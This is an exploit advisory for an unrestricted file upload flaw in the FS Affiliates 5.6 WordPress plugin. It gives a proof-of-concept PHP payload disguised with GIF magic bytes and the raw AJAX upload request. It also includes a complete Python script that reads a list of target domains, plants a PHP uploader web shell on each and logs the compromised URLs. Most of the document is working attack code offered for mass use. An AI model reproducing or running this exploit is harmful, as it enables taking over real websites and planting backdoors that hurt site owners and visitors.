####### [UnM@SK Security Advisory] #######
[#] Title: WordPress Plugin FS Affiliates 5.6 - Unrestricted Arbitrary File Upload
[#] Author: UnM@SK
[#] Date: 2026-01-23
[#] Plugin Name: FS Affiliates (folder: affs)
[#] Plugin Version: 5.6 (and possibly below)
[#] Vulnerability Type: Arbitrary File Upload / Remote Code Execution (RCE)
[#] Tested on: WordPress 6.x
--- [ DESCRIPTION ] ---
The plugin FS Affiliates for WordPress fails to properly validate file types and permissions in its AJAX file upload handler. An attacker can upload a malicious PHP script disguised with image magic bytes, leading to full server compromise (RCE).
--- [ PROOF OF CONCEPT ] ---
1. Prepare a file named "uploader.php" with the following content:
GIF89a
<?php echo "Pwned by UnM@SK"; phpinfo(); ?>
2. Send the following POST request:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [TARGET]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXMP3iUnCATDwy4ls
------WebKitFormBoundaryXMP3iUnCATDwy4ls
Content-Disposition: form-data; name="action"
fs_affiliates_file_upload
------WebKitFormBoundaryXMP3iUnCATDwy4ls
Content-Disposition: form-data; name="key"
fs_affiliates_file_upload_76
------WebKitFormBoundaryXMP3iUnCATDwy4ls
Content-Disposition: form-data; name="fs_affiliates_file_upload_76"; filename="uploader.php"
Content-Type: image/jpeg
[PAYLOAD_HERE]
------WebKitFormBoundaryXMP3iUnCATDwy4ls--
--- [ SHELL ACCESS ] ---
Successfully uploaded files can be accessed at:
http://[TARGET]/wp-content/uploads/fs-files/uploader.php
--- [ GREETZ ] ---
IdiotCrew - L4663R666H05T
#auto Exploit Input site list.txt no http/https in list and start python3 up.py
import requests
import urllib3
# Mematikan peringatan SSL
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# --- KONFIGURASI ---
TARGETS_FILE = 'list.txt'
OUTPUT_FILE = 'output.txt'
FILENAME = 'uploader.php'
# PHP Uploader Payload (dengan Header GIF89a untuk Bypass)
SHELL_PAYLOAD = '''GIF89a
<?php
echo "<b>[ Uploader Shell Loaded ]</b><br><br>";
if(isset($_FILES['file'])){
if(move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])){
echo "<font color='green'>Upload Success:</font> ".$_FILES['file']['name'];
} else {
echo "<font color='red'>Upload Failed!</font>";
}
}
?>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="Upload Now">
</form>
'''
def pwn(domain):
domain = domain.strip().replace('http://', '').replace('https://', '').rstrip('/')
if not domain: return
# Coba kedua protokol
for proto in ['https://', 'http://']:
base_url = f"{proto}{domain}"
ajax_url = f"{base_url}/wp-admin/admin-ajax.php"
shell_url = f"{base_url}/wp-content/uploads/fs-files/{FILENAME}"
print(f"[*] Targeting: {base_url}")
data = {
'action': 'fs_affiliates_file_upload',
'key': 'fs_affiliates_file_upload_76'
}
files = {
'fs_affiliates_file_upload_76': (FILENAME, SHELL_PAYLOAD, 'image/jpeg')
}
try:
# Kirim Shell
requests.post(ajax_url, data=data, files=files, timeout=12, verify=False)
# Verifikasi Shell
check = requests.get(shell_url, timeout=12, verify=False)
if check.status_code == 200 and "Uploader Shell Loaded" in check.text:
result = f"[+] PWNED: {shell_url}"
print(result)
with open(OUTPUT_FILE, 'a') as f:
f.write(result + '\n')
return # Stop jika sudah sukses di domain ini
else:
print(f" [-] Shell not found on {proto}")
except:
continue
def main():
try:
with open(TARGETS_FILE, 'r') as f:
targets = [line.strip() for line in f if line.strip()]
print(f"[*] Running exploit on {len(targets)} targets...")
for target in targets:
pwn(target)
print(f"\n[*] Finished. Results saved in {OUTPUT_FILE}")
except FileNotFoundError:
print(f"Error: {TARGETS_FILE} not found!")
if __name__ == "__main__":
main()
##########################################
